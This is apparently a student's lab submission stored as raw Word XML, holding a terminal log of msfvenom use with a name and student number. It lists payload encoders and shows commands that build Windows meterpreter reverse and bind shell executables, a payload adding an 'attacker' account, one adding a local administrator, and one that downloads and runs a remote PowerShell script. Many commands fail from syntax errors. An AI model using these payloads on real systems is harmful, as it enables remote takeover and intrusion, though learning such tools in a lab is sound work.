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1A8D" w14:textId="05770001" w:rsidR="00C43E4F" w:rsidRDefault="00C43E4F" w:rsidP="00842C07">
      <w:r>
        <w:t>Samiha Azeem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CADBC93" w14:textId="1012FBF9" w:rsidR="00C43E4F" w:rsidRDefault="00C43E4F" w:rsidP="00842C07">
      <w:r>
        <w:t>231462422</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A77554" w14:textId="77777777" w:rsidR="00C43E4F" w:rsidRDefault="00C43E4F" w:rsidP="00842C07"/>
    <w:p w14:paraId="4DAEEEF4" w14:textId="16137CCD" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>zsh: corrupt history file /home/samiha/.zsh_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B11E50D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88CF878" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">└─$ curl ifconfig.me        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2324D7C8" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">103.155.62.2                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5776D25F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47161A1" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ ^[[200~msfvenom -l payloads #Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBB0C2C" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>zsh: bad pattern: ^[[200~msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECEADAD" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E9C0CE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77967B85" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ msfvenom -l encoders #Encoders~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D919A" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07"/>
    <w:p w14:paraId="1A97BD8E" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Framework Encoders [--encoder &lt;value&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4FA6AF" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>======================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBA66F5" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07"/>
    <w:p w14:paraId="460CA79C" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    Name                     Rank       Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E86E702" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    ----                     ----       -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485921AD" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    cmd/brace                low        Bash Brace Expansion Command Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6DBDB2" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    cmd/echo                 good       Echo Command Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731312F4" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    cmd/generic_sh           manual     Generic Shell Variable Substitution Co</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCB0ACF" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        mmand Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316A7DE4" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    cmd/ifs                  low        Bourne ${IFS} Substitution Command Enc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6C73BC" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        oder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A0E052" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    cmd/perl                 normal     Perl Command Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACA6847" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    cmd/powershell_base64    excellent  Powershell Base64 Command Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520F585D" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    cmd/printf_php_mq        manual     printf(1) via PHP magic_quotes Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BDC931" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                         Command Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DC3BBC" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    generic/eicar            manual     The EICAR Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC7A75" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    generic/none             normal     The "none" Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7222A834" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    mipsbe/byte_xori         normal     Byte XORi Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369BBA98" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    mipsbe/longxor           normal     XOR Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F521BAF" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    mipsle/byte_xori         normal     Byte XORi Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFCC078" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    mipsle/longxor           normal     XOR Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70A8C5" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    php/base64               great      PHP Base64 Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0733A2" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    ppc/longxor              normal     PPC LongXOR Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72548BD1" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    ppc/longxor_tag          normal     PPC LongXOR Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3084B315" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    ruby/base64              great      Ruby Base64 Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD704AB" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    sparc/longxor_tag        normal     SPARC DWORD XOR Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDAFE5E" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x64/xor                  normal     XOR Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D4BDE" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x64/xor_context          normal     Hostname-based Context Keyed Payload E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3456E5" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        ncoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F66176" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x64/xor_dynamic          normal     Dynamic key XOR Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05D6A3" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x64/zutto_dekiru         manual     Zutto Dekiru</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E082533" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/add_sub              manual     Add/Sub Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3987E447" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/alpha_mixed          low        Alpha2 Alphanumeric Mixedcase Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4D4DF6" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/alpha_upper          low        Alpha2 Alphanumeric Uppercase Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B4ABDD" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/avoid_underscore_to  manual     Avoid underscore/tolower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331FA6D" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    lower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6109D4" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/avoid_utf8_tolower   manual     Avoid UTF8/tolower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C2E8F4" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/bloxor               manual     BloXor - A Metamorphic Block Based XOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586F916F" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                         Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2B4363" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/bmp_polyglot         manual     BMP Polyglot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C514AA" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/call4_dword_xor      normal     Call+4 Dword XOR Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6A696" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/context_cpuid        manual     CPUID-based Context Keyed Payload Enco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E218063" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        der</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16474323" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    x86/context_stat         manual     stat(2)-based Context Keyed Payload En</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E76237" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        coder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AFC347" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/context_time         manual     time(2)-based Context Keyed Payload En</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E358D4" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        coder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D39548" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/countdown            normal     Single-byte XOR Countdown Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E12C3F3" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/fnstenv_mov          normal     Variable-length Fnstenv/mov Dword XOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3FE20" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B68B19F" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/jmp_call_additive    normal     Jump/Call XOR Additive Feedback Encode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72E9BE" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E0037" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/nonalpha             low        Non-Alpha Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDB2C93" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/nonupper             low        Non-Upper Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49E123" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/opt_sub              manual     Sub Encoder (optimised)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794EDE78" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/service              manual     Register Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B98ADE" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/shikata_ga_nai       excellent  Polymorphic XOR Additive Feedback Enco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2611486F" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        der</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00147F61" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/single_static_bit    manual     Single Static Bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67506E" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/unicode_mixed        manual     Alpha2 Alphanumeric Unicode Mixedcase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F855B89" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A157A7F" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/unicode_upper        manual     Alpha2 Alphanumeric Unicode Uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55095159" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                        Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61829CCB" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/xor_dynamic          normal     Dynamic key XOR Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC6134D" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">    x86/xor_poly             normal     XOR POLY Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDF5EF8" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07"/>
    <w:p w14:paraId="534B1C72" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038F1EC7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249C7835" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">└─$ ^[[200~-b "\x00\x0a\x0d" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BC60C6" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>zsh: bad pattern: ^[[200~-b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D94566" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7448401B" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:lastRenderedPageBreak/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12D034C9" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">└─$ -f c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885C8ED" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>-f: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A17FF" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F75AB2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115F15F7" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">└─$ -e x86/shikata_ga_nai -i 5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DA5A28" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>-e: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC17790" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F14B0A5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17C981E9" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ EXITFUNC=thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28898490" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAF55A4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6775396F" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ PrependSetuid=True #Use this to create a shellcode that will execute something with SUID~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172954C2" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A54C80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B74A2EB" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">└─$ -b "\x00\x0a\x0d" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149AD1BD" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">-f c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126CF443" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">-e x86/shikata_ga_nai -i 5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E37572" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>EXITFUNC=thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491D7EB7" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>PrependSetuid=True #Use this to create a shellcode that will execute something with SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B930654" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>-b: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226681CF" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>-f: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518EAC01" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>-e: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696978FA" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E530E20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2351AC68" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=(103.155.62.2) LPORT=(80) -f exe &gt; reverse.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4FCFE6" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>zsh: unknown file attribute: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E7744A" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6164E42B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769222AE" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">└─$ msfvenom -p windows/meterpreter/bind_tcp RHOST=(103.155.62.2) LPORT=(80) -f exe &gt; bind.exe    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F495DFA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1CA727E6" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe &gt; adduser.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B2617E" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07"/>
    <w:p w14:paraId="7D530ECA" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B4A6C" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>[-] No arch selected, selecting arch: x86 from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1318EF" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Error: Password: attacker@123 doesn't meet complexity requirements and may cause issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B03A81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73C12ABF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5491D0F4" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">└─$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A0C4F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11873394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AD2786E" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ msfvenom -p windows/shell/reverse_tcp LHOST=(103.155.62.2) LPORT=(80) -f exe &gt; prompt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4762C843" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>zsh: unknown file attribute: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A983F0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0937609D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2C821305" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe &gt; pay.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15207232" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe &gt; pay.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C9B7AA" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D97C3E3" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Payload size: 267 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124287C0" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Final size of exe file: 73802 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5E91A4" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
